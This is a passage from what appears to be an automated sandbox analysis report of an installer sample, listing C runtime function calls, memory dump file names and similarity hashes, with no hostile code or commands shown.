                  • __getptd.LIBCMT ref: 00B77AC8
                    • Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
                    • Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC
                  • __getptd.LIBCMT ref: 00B77AD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                  • Instruction ID: da7abecdaa6f2ea4220cd61faae0066a39fca49a6a73be07210bb3902c4957c7
                  • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                  • Instruction Fuzzy Hash: A0014F398452058BCF389F62C45866DB3F5EF14311F2488ADE06956661CF308A81CB11